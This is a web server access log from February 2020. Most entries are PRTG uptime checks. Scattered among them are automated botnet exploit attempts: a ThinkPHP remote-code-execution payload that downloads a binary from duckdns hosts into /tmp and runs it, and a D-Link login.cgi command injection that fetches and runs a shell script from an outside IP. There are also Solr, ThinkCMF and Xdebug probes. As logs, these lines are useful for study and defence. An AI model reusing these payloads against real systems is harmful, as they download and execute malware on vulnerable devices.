212.91.246.72 - - [03/Feb/2020:11:57:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:11:58:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:11:59:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
121.232.55.151 - - [03/Feb/2020:12:00:27 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:00:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:01:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:02:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:03:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.68.185.14 - - [03/Feb/2020:12:04:15 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:04:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:05:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.213.122.46 - - [03/Feb/2020:12:05:35 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
90.166.225.10 - - [03/Feb/2020:12:05:37 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [03/Feb/2020:12:06:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:07:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:08:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:09:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.158.191.155 - - [03/Feb/2020:12:09:57 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [03/Feb/2020:12:10:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.80.222.252 - - [03/Feb/2020:12:11:19 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:11:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.230.109.128 - - [03/Feb/2020:12:12:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.109.128 - - [03/Feb/2020:12:12:30 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:12:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.141.139.61 - - [03/Feb/2020:12:13:11 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:13:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:14:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.22.107.175 - - [03/Feb/2020:12:14:57 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:15:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
119.194.64.96 - - [03/Feb/2020:12:15:38 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:16:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
130.193.148.138 - - [03/Feb/2020:12:17:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:12:17:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.80.1.203 - - [03/Feb/2020:12:17:44 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:18:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
202.29.30.253 - - [03/Feb/2020:12:18:45 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
105.27.173.22 - - [03/Feb/2020:12:19:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0(iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46"
212.91.246.72 - - [03/Feb/2020:12:19:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.53.223.35 - - [03/Feb/2020:12:20:19 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:20:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:21:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:22:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:23:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:24:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
121.23.141.60 - - [03/Feb/2020:12:24:52 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [03/Feb/2020:12:25:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:26:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:27:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:28:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.225.119.202 - - [03/Feb/2020:12:28:33 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
46.225.119.202 - - [03/Feb/2020:12:28:34 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
212.91.246.72 - - [03/Feb/2020:12:29:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.164.103.208 - - [03/Feb/2020:12:30:23 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:30:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:31:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:32:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.153.52.161 - - [03/Feb/2020:12:33:10 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [03/Feb/2020:12:33:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:34:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:35:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.247.177.230 - - [03/Feb/2020:12:35:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:12:36:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
175.35.173.108 - - [03/Feb/2020:12:36:55 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [03/Feb/2020:12:37:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
119.77.123.165 - - [03/Feb/2020:12:38:22 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:38:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.69.191.98 - - [03/Feb/2020:12:39:00 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:39:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:40:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.119.138.131 - - [03/Feb/2020:12:40:45 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
189.153.201.141 - - [03/Feb/2020:12:41:22 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://scan.casualaffinity.net/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:41:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:42:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:43:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.100.11.237 - - [03/Feb/2020:12:43:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:12:44:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:45:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:46:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:47:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:48:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.116.224.193 - - [03/Feb/2020:12:49:27 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:49:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.137.207 - - [03/Feb/2020:12:50:12 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:50:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
124.6.232.78 - - [03/Feb/2020:12:50:42 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
80.191.250.156 - - [03/Feb/2020:12:51:12 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:51:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.101.0.209 - - [03/Feb/2020:12:51:50 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
95.152.59.119 - - [03/Feb/2020:12:51:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.101.0.209 - - [03/Feb/2020:12:52:03 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
118.68.179.200 - - [03/Feb/2020:12:52:10 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
5.101.0.209 - - [03/Feb/2020:12:52:16 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:12:52:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:53:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.20.134 - - [03/Feb/2020:12:54:02 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:54:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:55:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:56:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.80.61.45 - - [03/Feb/2020:12:56:32 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
42.117.137.99 - - [03/Feb/2020:12:57:11 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [03/Feb/2020:12:57:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:58:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:12:59:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:00:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.101.0.209 - - [03/Feb/2020:13:00:46 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [03/Feb/2020:13:00:47 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [03/Feb/2020:13:00:59 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [03/Feb/2020:13:01:00 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [03/Feb/2020:13:01:12 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [03/Feb/2020:13:01:12 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:13:01:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:02:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:03:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:04:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:05:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2020:13:06:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.230.228.54 - - [03/Feb/2020:13:06:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.101.0.209 - - [03/Feb/2020:13:07:28 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Feb/2020:13:07:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.69.142.112 - - [03/Feb/2020:13:07:39 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
5.101.0.209 - - [03/Feb/2020:13:07:42 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [03/Feb/2020:13:07:55 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
42.237.3.160 - - [03/Feb/2020:13:08:00 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
